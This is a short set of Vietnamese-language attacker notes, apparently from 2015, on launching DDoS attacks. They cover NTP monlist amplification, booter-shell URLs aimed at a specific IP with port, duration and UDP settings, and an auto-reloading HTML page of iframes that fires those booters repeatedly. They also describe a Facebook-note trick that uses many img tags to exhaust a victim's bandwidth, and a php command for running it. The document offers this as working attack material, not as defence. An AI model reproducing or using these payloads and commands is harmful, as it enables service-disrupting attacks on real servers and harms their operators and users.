Ddos 2015

Xu hướng tấn công mạng hiện nay và tương lai

0.Dr-Ddos

Hình thức dùng proxy từ google để "hợp thức hóa" các yêu cầu đến các server lớn

1. DDos NTP : attacker gửi request đến -> NTP server -> monlist ( danh sách server nó kết nối đến ) -> victim
Muốn đánh được dạng này cần phải có ntp list server
http://6789team.blogspot.com/2014/11/anonhqcom.html

2.Ddos Booter
2.1 panel
Shell chạy dưới 1 số curl
http://server.com/booter.php?act=phptools&host=
hoặc : http://server.com/booter.php?host=203.162.56.76&port=53&time=30&type=UDP
hoặc : http://server.com/booter.php?dos=&ip=203.162.56.76&port=1364&timeout=5&exTime=10&noOfBytes=999999

2.1 Tool

2.2 Web : dạng này 1 lần refesh là ddos 1 lượt nên cực kỳ mạnh mẻ ( 15000 = 15 giây , times con bot =10 giây)

<html><script type="text/javascript">
init_reload();
function init_reload(){
setInterval( function() {
window.location.reload();
},15000);
}
</script>
<br>
*** Dang 1 ?act=phptools&host= ***
<br>
<iframe src="http://server.com/booter.php?host=?act=phptools&host="></iframe>
<br>
*** Dang 2 index.php?host= ***
<iframe src="http://server.com/booter.php?host=203.162.56.76&port=53&time=10&type=UDP"></iframe>
<br>
*** Dang 3 index.php?host= ***
<br>
<iframe src="http://server.com/booter.php?dos=&ip=203.162.56.76&port=53&timeout=5&exTime=10&noOfBytes=999999"></iframe>
</html>
------------
demo 1 con bot thuộc dạng vip trên server của mình là 700 MB/s ~ 1/2 GB/s
làm 1 bài toán nhé : 1000 bot = 1000x1/2 = 500G/s
cho nên các cpanel stress hay booter > 300 GB/s là việc bình thường
nhưng còn tuỳ thuộc tốc độ đường truyền giữa bot và server nữa

3. Facebook note ( ngốn băng thông )
facebook nó sẻ chặn các yều cầu khi bạn refesh lại note , cho nên phải tấn công với nhìu ip vào note thì mới được
note :
<img src='http://victim.com/phim_cap_3.zip?r=1/>
...
<img src='http://victim.com/phim_cap_3.zip?r=1000/>
------------
cmd :
php d.php https://www.facebook.com/notes/thangwoo/test/999296046754518 80 ( port 80)